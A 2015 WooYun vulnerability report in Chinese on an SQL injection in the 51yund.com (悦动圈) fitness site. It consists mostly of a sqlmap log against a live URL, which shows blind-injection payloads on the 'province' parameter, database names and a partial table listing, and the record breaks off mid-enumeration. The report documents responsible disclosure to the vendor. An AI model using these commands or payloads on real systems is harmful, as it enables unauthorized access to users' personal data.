当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114238

漏洞标题:悦动圈某处SQL注入可影响全网数据(涉及一百八十五万用户信息)

相关厂商:51yund.com

漏洞作者: 蛋蛋侠

提交时间:2015-05-15 10:16

修复时间:2015-06-29 11:00

公开时间:2015-06-29 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

@悦动圈 乌云快递,您的漏洞预计,今日到达,请注意查收!有任何问题请联系我!

详细说明:

QQ截图20150515100039.png


QQ截图20150515100219.png


QQ截图20150515100249.png

[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 08:54:47
[08:54:47] [INFO] testing connection to the target URL
[08:54:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:54:48] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable paramete
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[08:54:50] [INFO] testing if GET parameter 'top_type' is dynamic
[08:54:50] [INFO] heuristics detected web page charset 'ascii'
[08:54:50] [INFO] confirming that GET parameter 'top_type' is dynamic
[08:54:50] [WARNING] GET parameter 'top_type' does not appear dynamic
[08:54:50] [WARNING] heuristic (basic) test shows that GET parameter 'top_type' might not be injectable
[08:54:50] [INFO] testing for SQL injection on GET parameter 'top_type'
[08:54:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:54:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:54:54] [INFO] testing 'MySQL inline queries'
[08:54:54] [INFO] testing 'PostgreSQL inline queries'
[08:54:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:54:54] [INFO] testing 'Oracle inline queries'
[08:54:54] [INFO] testing 'SQLite inline queries'
[08:54:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:54:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:54:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:54:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:54:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:54:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:54:58] [INFO] testing 'Oracle AND time-based blind'
[08:54:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[08:55:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[08:55:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using
[08:55:15] [WARNING] GET parameter 'top_type' is not injectable
[08:55:15] [INFO] testing if GET parameter 'is_share' is dynamic
[08:55:15] [WARNING] GET parameter 'is_share' does not appear dynamic
[08:55:16] [WARNING] heuristic (basic) test shows that GET parameter 'is_share' might not be injectable
[08:55:16] [INFO] testing for SQL injection on GET parameter 'is_share'
[08:55:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:55:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:55:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:55:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:22] [INFO] testing 'MySQL inline queries'
[08:55:23] [INFO] testing 'PostgreSQL inline queries'
[08:55:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:55:23] [INFO] testing 'Oracle inline queries'
[08:55:23] [INFO] testing 'SQLite inline queries'
[08:55:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:55:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:55:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:55:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:55:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:55:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:55:29] [INFO] testing 'Oracle AND time-based blind'
[08:55:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[08:55:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[08:55:50] [INFO] target URL appears to be UNION injectable with 10 columns
[08:55:50] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[08:57:33] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[08:57:35] [WARNING] GET parameter 'is_share' is not injectable
[08:57:35] [INFO] testing if GET parameter 'order_type' is dynamic
[08:57:35] [INFO] confirming that GET parameter 'order_type' is dynamic
[08:57:35] [WARNING] GET parameter 'order_type' does not appear dynamic
[08:57:36] [WARNING] heuristic (basic) test shows that GET parameter 'order_type' might not be injectable
[08:57:36] [INFO] testing for SQL injection on GET parameter 'order_type'
[08:57:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:57:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:57:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:57:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:57:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:57:39] [INFO] testing 'MySQL inline queries'
[08:57:40] [INFO] testing 'PostgreSQL inline queries'
[08:57:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:57:40] [INFO] testing 'Oracle inline queries'
[08:57:40] [INFO] testing 'SQLite inline queries'
[08:57:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:57:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:57:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:57:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:57:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:57:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:57:44] [INFO] testing 'Oracle AND time-based blind'
[08:57:45] [INFO] testing 'MySQL UNION query (72) - 1 to 10 columns'
[08:57:52] [INFO] testing 'Generic UNION query (72) - 1 to 10 columns'
[08:58:31] [WARNING] GET parameter 'order_type' is not injectable
[08:58:31] [INFO] testing if GET parameter 'province' is dynamic
[08:58:32] [INFO] confirming that GET parameter 'province' is dynamic
[08:58:32] [INFO] GET parameter 'province' is dynamic
[08:58:32] [WARNING] heuristic (basic) test shows that GET parameter 'province' might not be injectable
[08:58:32] [INFO] testing for SQL injection on GET parameter 'province'
[08:58:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:58:32] [WARNING] reflective value(s) found and filtering out
[08:58:34] [INFO] GET parameter 'province' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[08:58:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[08:58:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:58:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[08:58:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:58:36] [INFO] testing 'MySQL inline queries'
[08:58:36] [INFO] testing 'PostgreSQL inline queries'
[08:58:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:58:36] [INFO] testing 'Oracle inline queries'
[08:58:36] [INFO] testing 'SQLite inline queries'
[08:58:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:58:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:58:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:58:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:59:36] [INFO] GET parameter 'province' is 'MySQL > 5.0.11 AND time-based blind' injectable
[08:59:36] [INFO] testing 'MySQL UNION query (72) - 1 to 20 columns'
[08:59:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique
[08:59:59] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:59:59] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wa
[09:00:09] [INFO] testing 'Generic UNION query (72) - 1 to 20 columns'
GET parameter 'province' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:00:44] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 662 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:00:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:00:44] [INFO] fetching database names
[09:00:44] [INFO] fetching number of databases
[09:00:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:00:44] [INFO] retrieved: 3
[09:00:45] [INFO] retrieved: information_schema
[09:01:11] [INFO] retrieved: sport
[09:01:19] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] sport
[*] test
[09:01:32] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 424 times
[09:01:32] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\circle.51yund.com'
[*] shutting down at 09:01:32
[root@Hacker~]# Sqlmap Sqlmap -u "http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省" -D sp
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 09:03:54
[09:03:54] [INFO] resuming back-end DBMS 'mysql'
[09:03:54] [INFO] testing connection to the target URL
[09:03:54] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandl
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND 6787=6787 AND 'oXfA'='oXfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: top_type=city&is_share=true&order_type=distance&province=???' AND SLEEP(5) AND 'vasu'='vasu
---
[09:03:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[09:03:54] [INFO] fetching tables for database: 'sport'
[09:03:54] [INFO] fetching number of tables for database 'sport'
[09:03:54] [INFO] retrieved:
[09:03:54] [WARNING] reflective value(s) found and filtering out
197
[09:04:11] [INFO] retrieving the length of query output
[09:04:11] [INFO] retrieved: 24
[09:04:32] [INFO] retrieved: activity_ads_for_web_new
[09:04:32] [INFO] retrieving the length of query output
[09:04:32] [INFO] retrieved: 18
[09:04:43] [INFO] retrieved: activity_feed_info
[09:04:44] [INFO] retrieving the length of query output
[09:04:44] [INFO] retrieved: 13
[09:04:58] [INFO] retrieved: activity_info
[09:04:58] [INFO] retrieving the length of query output
[09:04:58] [INFO] retrieved: 25
[09:05:14] [INFO] retrieved: activity_intro_photo_info
[09:05:14] [INFO] retrieving the length of query output
[09:05:14] [INFO] retrieved: 18
[09:05:26] [INFO] retrieved: activity_kind_info
[09:05:26] [INFO] retrieving the length of query output
[09:05:26] [INFO] retrieved: 15
[09:05:36] [INFO] retrieved: activity_member
[09:05:36] [INFO] retrieving the length of query output
[09:05:36] [INFO] retrieved: 14
[09:05:46] [INFO] retrieved: activity_photo
[09:05:46] [INFO] retrieving the length of query output
[09:05:46] [INFO] retrieved: 20
[09:05:59] [INFO] retrieved: activity_praise_info
[09:05:59] [INFO] retrieving the length of query output
[09:05:59] [INFO] retrieved: 22
[09:06:13] [INFO] retrieved: activity_property_info
[09:06:13] [INFO] retrieving the length of query output
[09:06:13] [INFO] retrieved: 14
[09:06:22] [INFO] retrieved: activity_score
[09:06:22] [INFO] retrieving the length of query output
[09:06:22] [INFO] retrieved: 18
[09:06:33] [INFO] retrieved: activity_tickets64
[09:06:34] [INFO] retrieving the length of query output
[09:06:34] [INFO] retrieved: 7
[09:06:39] [INFO] retrieved: address
[09:06:39] [INFO] retrieving the length of query output
[09:06:39] [INFO] retrieved: 14
[09:06:49] [INFO] retrieved: admanager__ads 13/14 (93%)
[09:06:49] [INFO] retrieving the length of query output
[09:06:49] [INFO] retrieved: 20
[09:07:01] [INFO] retrieved: admanager__campaigns
[09:07:01] [INFO] retrieving the length of query output
[09:07:01] [INFO] retrieved: 23
[09:07:15] [INFO] retrieved: ad_anag____interactions 20/23 (87%)
[09:07:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:07:27] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[09:07:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:07:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:07:29] [INFO] retrieved: admanager__interactions
[09:07:29] [INFO] retrieving the length of query output
[09:07:29] [INFO] retrieved: 11
[09:07:38] [INFO] retrieved: army_passwd
[09:07:38] [INFO] retrieving the length of query output
[09:07:38] [INFO] retrieved: 16
[09:07:50] [INFO] retrieved: army_report_user
[09:07:50] [INFO] retrieving the length of query output
[09:07:50] [INFO] retrieved: 19
[09:08:14] [INFO] retrieved: army_report_user_50
[09:08:14] [INFO] retrieving the length of query output
[09:08:14] [INFO] retrieved: 20
[09:08:30] [INFO] retrieved: army_report_user_tmp
[09:08:30] [INFO] retrieving the length of query output
[09:08:30] [INFO] retrieved: 13
[09:08:41] [INFO] retrieved: army_run_info
[09:08:41] [INFO] retrieving the length of query output
[09:08:41] [INFO] retrieved: 14
[09:08:53] [INFO] retrieved: bean_qq_upload
[09:08:53] [INFO] retrieving the length of query output
[09:08:53] [INFO] retrieved: 19
[09:09:06] [INFO] retrieved: bean_qq_upload_stat
[09:09:06] [INFO] retrieving the length of query output
[09:09:06] [INFO] retrieved: 18
[09:09:19] [INFO] retrieved: bracele__msg_table 17/18 (94%)
[09:09:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:09:34] [INFO] retrieved: bracelet_msg_table
[09:09:34] [INFO] retrieving the length of query output
[09:09:34] [INFO] retrieved: 27
[09:09:52] [INFO] retrieved: bracelet_msg_template_table
[09:09:52] [INFO] retrieving the length of query output
[09:09:52] [INFO] retrieved: 20
[09:10:06] [INFO] retrieved: bracelet_runner_info
[09:10:06] [INFO] retrieving the length of query output
[09:10:06] [INFO] retrieved: 23
[09:10:30] [INFO] retrieved: bracelet_user_area_stat
[09:10:30] [INFO] retrieving the length of query output
[09:10:30] [INFO] retrieved: 23
[09:10:46] [INFO] retrieved: bracelet_user_plat_stat
[09:10:46] [INFO] retrieving the length of query output
[09:10:46] [INFO] retrieved: 22
[09:11:03] [INFO] retrieved: bracelet_user__un_stat 21/22 (95%)
[09:11:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:11:19] [INFO] retrieved: bracelet_user_run_stat
[09:11:19] [INFO] retrieving the length of query output
[09:11:19] [INFO] retrieved: 31
[09:11:40] [INFO] retrieved: bracelet_user_sex_keyrange_stat
[09:11:40] [INFO] retrieving the length of query output
[09:11:40] [INFO] retrieved: 16
[09:11:51] [INFO] retrieved: bracelet_version
[09:11:51] [INFO] retrieving the length of query output
[09:11:51] [INFO] retrieved: 4
[09:11:55] [INFO] retrieved: cat1
[09:11:55] [INFO] retrieving the length of query output
[09:11:55] [INFO] retrieved: 4
[09:11:59] [INFO] retrieved: cat2
[09:11:59] [INFO] retrieving the length of query output
[09:11:59] [INFO] retrieved: 4
[09:12:04] [INFO] retrieved: cat3
[09:12:04] [INFO] retrieving the length of query output
[09:12:04] [INFO] retrieved: 20
[09:12:19] [INFO] retrieved: circle_activity_info
[09:12:19] [INFO] retrieving the length of query output
[09:12:19] [INFO] retrieved: 17
[09:12:32] [INFO] retrieved: circle_extra_info
[09:12:32] [INFO] retrieving the length of query output
[09:12:32] [INFO] retrieved: 23
[09:12:49] [INFO] retrieved: circle_group_runner_top
[09:12:49] [INFO] retrieving the length of query output
[09:12:49] [INFO] retrieved: 11
[09:12:58] [INFO] retrieved: circle_info
[09:12:58] [INFO] retrieving the length of query output
[09:12:58] [INFO] retrieved: 11
[09:13:07] [INFO] retrieved: circle_stat
[09:13:07] [INFO] retrieving the length of query output
[09:13:07] [INFO] retrieved: 16
[09:13:18] [INFO] retrieved: circle_tickets64
[09:13:18] [INFO] retrieving the length of query output
[09:13:18] [INFO] retrieved: 4
[09:13:23] [INFO] retrieved: city
[09:13:23] [INFO] retrieving the length of query output
[09:13:23] [INFO] retrieved: 12
[09:13:41] [INFO] retrieved: city_addre_s 11/12 (92%)
[09:13:52] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:13:54] [INFO] retrieved: city_address
[09:13:54] [INFO] retrieving the length of query output
[09:13:54] [INFO] retrieved: 9
[09:14:01] [INFO] retrieved: city_area
[09:14:01] [INFO] retrieving the length of query output
[09:14:01] [INFO] retrieved: 23
[09:14:19] [INFO] retrieved: custom_service_question
[09:14:19] [INFO] retrieving the length of query output
[09:14:19] [INFO] retrieved: 10
[09:14:27] [INFO] retrieved: day_remain
[09:14:27] [INFO] retrieving the length of query output
[09:14:27] [INFO] retrieved: 8
[09:14:34] [INFO] retrieved: day_stat
[09:14:34] [INFO] retrieving the length of query output
[09:14:34] [INFO] retrieved: 11
[09:14:44] [INFO] retrieved: device_info
[09:14:44] [INFO] retrieving the length of query output
[09:14:44] [INFO] retrieved: 18
[09:14:57] [INFO] retrieved: discuss_photo_info
[09:14:57] [INFO] retrieving the length of query output
[09:14:57] [INFO] retrieved: 17
[09:15:10] [INFO] retrieved: discuss_tickets64
[09:15:10] [INFO] retrieving the length of query output
[09:15:10] [INFO] retrieved: 15
[09:15:22] [INFO] retrieved: discussion_info
[09:15:22] [INFO] retrieving the length of query output
[09:15:22] [INFO] retrieved: 16
[09:15:33] [INFO] retrieved: draw_cash_record
[09:15:33] [INFO] retrieving the length of query output
[09:15:33] [INFO] retrieved: 18
[09:15:47] [INFO] retrieved: draw_reward_record
[09:15:47] [INFO] retrieving the length of query output
[09:15:47] [INFO] retrieved: 20
[09:16:01] [INFO] retrieved: dynamic_feed_discuss
[09:16:01] [INFO] retrieving the length of query output
[09:16:01] [INFO] retrieved: 15
[09:16:14] [INFO] retrieved: dynamic_feed_id
[09:16:14] [INFO] retrieving the length of query output
[09:16:14] [INFO] retrieved: 17
[09:16:25] [INFO] retrieved: dynamic_feed_info
[09:16:25] [INFO] retrieving the length of query output
[09:16:25] [INFO] retrieved: 17
[09:16:45] [INFO] retrieved: dynamic_feed_like
[09:16:45] [INFO] retrieving the length of query output
[09:16:45] [INFO] retrieved: 10
[09:16:53] [INFO] retrieved: enum_index
[09:16:53] [INFO] retrieving the length of query output
[09:16:53] [INFO] retrieved: 10
[09:17:00] [INFO] retrieved: error_stat
[09:17:00] [INFO] retrieving the length of query output
[09:17:00] [INFO] retrieved: 9
[09:17:07] [INFO] retrieved: feed_info
[09:17:07] [INFO] retrieving the length of query output
[09:17:07] [INFO] retrieved: 15
[09:17:17] [INFO] retrieved: fee__photo_info 14/15 (93%)
[09:17:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:17:36] [INFO] retrieved: feed_photo_info
[09:17:36] [INFO] retrieving the length of query output
[09:17:36] [INFO] retrieved: 16
[09:17:47] [INFO] retrieved: feed_praise_info
[09:17:47] [INFO] retrieving the length of query output
[09:17:47] [INFO] retrieved: 14
[09:17:57] [INFO] retrieved: feed_tickets64
[09:17:57] [INFO] retrieving the length of query output
[09:17:57] [INFO] retrieved: 9
[09:18:03] [INFO] retrieved: feed_type
[09:18:03] [INFO] retrieving the length of query output
[09:18:03] [INFO] retrieved: 10
[09:18:11] [INFO] retrieved: get_notify
[09:18:11] [INFO] retrieving the length of query output
[09:18:11] [INFO] retrieved: 18
[09:18:24] [INFO] retrieved: get_notify_user_ts
[09:18:24] [INFO] retrieving the length of query output
[09:18:24] [INFO] retrieved: 14
[09:18:36] [INFO] retrieved: group_run_info 13/14 (93%)
[09:18:36] [INFO] retrieving the length of query output
[09:18:36] [INFO] retrieved: 14
[09:18:48] [INFO] retrieved: group_run_stat
[09:18:48] [INFO] retrieving the length of query output
[09:18:48] [INFO] retrieved: 21
[09:19:03] [INFO] retrieved: history_user_day_step
[09:19:03] [INFO] retrieving the length of query output
[09:19:03] [INFO] retrieved: 23
[09:19:20] [INFO] retrieved: history_user_runner_new
[09:19:20] [INFO] retrieving the length of query output
[09:19:20] [INFO] retrieved: 21
[09:19:34] [INFO] retrieved: hundred_batchall_flag
[09:19:34] [INFO] retrieving the length of query output
[09:19:34] [INFO] retrieved: 24
[09:19:53] [INFO] retrieved: hun_re__c_rcle_group_run 21/24 (88%)
[09:20:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:20:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:20:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:20:06] [INFO] retrieved: hundred_circle_group_run
[09:20:06] [INFO] retrieving the length of query output
[09:20:06] [INFO] retrieved: 30
[09:20:24] [INFO] retrieved: hundred_circle_group_run_extra
[09:20:24] [INFO] retrieving the length of query output
[09:20:24] [INFO] retrieved: 30
[09:20:42] [INFO] retrieved: hundred_circle_group_run_score
[09:20:42] [INFO] retrieving the length of query output
[09:20:42] [INFO] retrieved: 22
[09:20:56] [INFO] retrieved: hundred_group_run_info
[09:20:56] [INFO] retrieving the length of query output
[09:20:56] [INFO] retrieved: 22
[09:21:10] [INFO] retrieved: hundred_host_group_run
[09:21:10] [INFO] retrieving the length of query output
[09:21:10] [INFO] retrieved: 22
[09:21:26] [INFO] retrieved: hundred_user_group_run
[09:21:26] [INFO] retrieving the length of query output
[09:21:26] [INFO] retrieved: 12
[09:21:35] [INFO] retrieved: hx_user_info 11/12 (92%)
[09:21:52] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:21:54] [INFO] retrieved: hx_user_info
[09:21:54] [INFO] retrieving the length of query output
[09:21:54] [INFO] retrieved: 13
[09:22:04] [INFO] retrieved: invite_openid
[09:22:04] [INFO] retrieving the length of query output
[09:22:04] [INFO] retrieved: 16
[09:22:16] [INFO] retrieved: invite_user_info
[09:22:16] [INFO] retrieving the length of query output
[09:22:16] [INFO] retrieved: 17
[09:22:28] [INFO] retrieved: invited_user_info
[09:22:28] [INFO] retrieving the length of query output
[09:22:28] [INFO] retrieved: 7
[09:22:34] [INFO] retrieved: ip_area
[09:22:34] [INFO] retrieving the length of query output
[09:22:34] [INFO] retrieved: 8
[09:22:40] [INFO] retrieved: jiaolian
[09:22:40] [INFO] retrieving the length of query output
[09:22:40] [INFO] retrieved: 9
[09:22:54] [INFO] retrieved: log_query
[09:22:54] [INFO] retrieving the length of query output
[09:22:54] [INFO] retrieved: 15
[09:23:05] [INFO] retrieved: log_report_user
[09:23:05] [INFO] retrieving the length of query output
[09:23:05] [INFO] retrieved: 10
[09:23:13] [INFO] retrieved: mall_buyer
[09:23:13] [INFO] retrieving the length of query output
[09:23:13] [INFO] retrieved: 19
[09:23:33] [INFO] retrieved: mall_circle_product
[09:23:33] [INFO] retrieving the length of query output
[09:23:33] [INFO] retrieved: 10
[09:23:41] [INFO] retrieved: mall_order
[09:23:41] [INFO] retrieving the length of query output
[09:23:41] [INFO] retrieved: 12
[09:23:51] [INFO] retrieved: mall_product
[09:23:51] [INFO] retrieving the length of query output
[09:23:51] [INFO] retrieved: 19
[09:24:04] [INFO] retrieved: mall_product_commit
[09:24:04] [INFO] retrieving the length of query output
[09:24:04] [INFO] retrieved: 19
[09:24:19] [INFO] retrieved: mallorder_tickets64
[09:24:19] [INFO] retrieving the length of query output
[09:24:19] [INFO] retrieved: 17
[09:24:30] [INFO] retrieved: marathon_run_info
[09:24:30] [INFO] retrieving the length of query output
[09:24:30] [INFO] retrieved: 20
[09:24:45] [INFO] retrieved: marathon_runner_info
[09:24:45] [INFO] retrieving the length of query output
[09:24:45] [INFO] retrieved: 18
[09:24:56] [INFO] retrieved: marathon_team_info
[09:24:56] [INFO] retrieving the length of query output
[09:24:56] [INFO] retrieved: 12
[09:25:06] [INFO] retrieved: marathon_top
[09:25:06] [INFO] retrieving the length of query output
[09:25:06] [INFO] retrieved: 22
[09:25:23] [INFO] retrieved: marathon_user_run_info
[09:25:23] [INFO] retrieving the length of query output
[09:25:23] [INFO] retrieved: 25
[09:25:39] [INFO] retrieved: marathon_user_run_info_bk
[09:25:39] [INFO] retrieving the length of query output
[09:25:39] [INFO] retrieved: 14
[09:25:50] [INFO] retrieved: media__gallery
[09:25:50] [INFO] retrieving the length of query output
[09:25:50] [INFO] retrieved: 20
[09:26:06] [INFO] retrieved: media__gallery_media
[09:26:06] [INFO] retrieving the length of query output
[09:26:06] [INFO] retrieved: 12
[09:26:17] [INFO] retrieved: media__media
[09:26:17] [INFO] retrieving the length of query output
[09:26:17] [INFO] retrieved: 14
[09:26:28] [INFO] retrieved: message_delete
[09:26:28] [INFO] retrieving the length of query output
[09:26:28] [INFO] retrieved: 12
[09:26:39] [INFO] retrieved: message_info
[09:26:39] [INFO] retrieving the length of query output
[09:26:39] [INFO] retrieved: 17
[09:26:51] [INFO] retrieved: message_info_uniq
[09:26:51] [INFO] retrieving the length of query output
[09:26:51] [INFO] retrieved: 17
[09:27:03] [INFO] retrieved: message_tickets64
[09:27:03] [INFO] retrieving the length of query output
[09:27:03] [INFO] retrieved: 14
[09:27:15] [INFO] retrieved: message_unread
[09:27:15] [INFO] retrieving the length of query output
[09:27:15] [INFO] retrieved: 12
[09:27:26] [INFO] retrieved: month_remain
[09:27:26] [INFO] retrieving the length of query output
[09:27:26] [INFO] retrieved: 23
[09:27:42] [INFO] retrieved: nday_challenge_run_info
[09:27:42] [INFO] retrieving the length of query output
[09:27:42] [INFO] retrieved: 24
[09:28:04] [INFO] retrieved: nday_challenge_user_info
[09:28:04] [INFO] retrieving the length of query output
[09:28:04] [INFO] retrieved: 25
[09:28:21] [INFO] retrieved: nkm_challenge_report_user
[09:28:21] [INFO] retrieving the length of query output
[09:28:21] [INFO] retrieved: 22
[09:28:36] [INFO] retrieved: nkm_challenge_run_info
[09:28:36] [INFO] retrieving the length of query output
[09:28:36] [INFO] retrieved: 23
[09:28:58] [INFO] retrieved: nkm_challenge_user_info
[09:28:58] [INFO] retrieving the length of query output
[09:28:58] [INFO] retrieved: 28
[09:29:16] [INFO] retrieved: nkm_challenge_user_info_city
[09:29:16] [INFO] retrieving the length of query output
[09:29:16] [INFO] retrieved: 11
[09:29:24] [INFO] retrieved: openid_info
[09:29:24] [INFO] retrieving the length of query output
[09:29:24] [INFO] retrieved: 4
[09:29:29] [INFO] retrieved: page
[09:29:29] [INFO] retrieving the length of query output
[09:29:29] [INFO] retrieved: 20
[09:29:42] [INFO] retrieved: phone_code_tickets64
[09:29:42] [INFO] retrieving the length of query output
[09:29:42] [INFO] retrieved: 10
[09:29:50] [INFO] retrieved: photo_info
[09:29:50] [INFO] retrieving the length of query output
[09:29:50] [INFO] retrieved: 15
[09:30:02] [INFO] retrieved: photo_tickets64
[09:30:02] [INFO] retrieving the length of query output
[09:30:02] [INFO] retrieved: 13
[09:30:13] [INFO] retrieved: province_city
[09:30:14] [INFO] retrieving the length of query output
[09:30:14] [INFO] retrieved: 11
[09:30:22] [INFO] retrieved: pusher_info
[09:30:22] [INFO] retrieving the length of query output
[09:30:22] [INFO] retrieved: 13
[09:30:32] [INFO] retrieved: pusher_record
[09:30:32] [INFO] retrieving the length of query output
[09:30:32] [INFO] retrieved: 14
[09:30:43] [INFO] retrieved: request_detail
[09:30:44] [INFO] retrieving the length of query output
[09:30:44] [INFO] retrieved: 8
[09:30:50] [INFO] retrieved: run_game
[09:30:50] [INFO] retrieving the length of query output
[09:30:50] [INFO] retrieved: 11
[09:30:59] [INFO] retrieved: runner_info
[09:30:59] [INFO] retrieving the length of query output
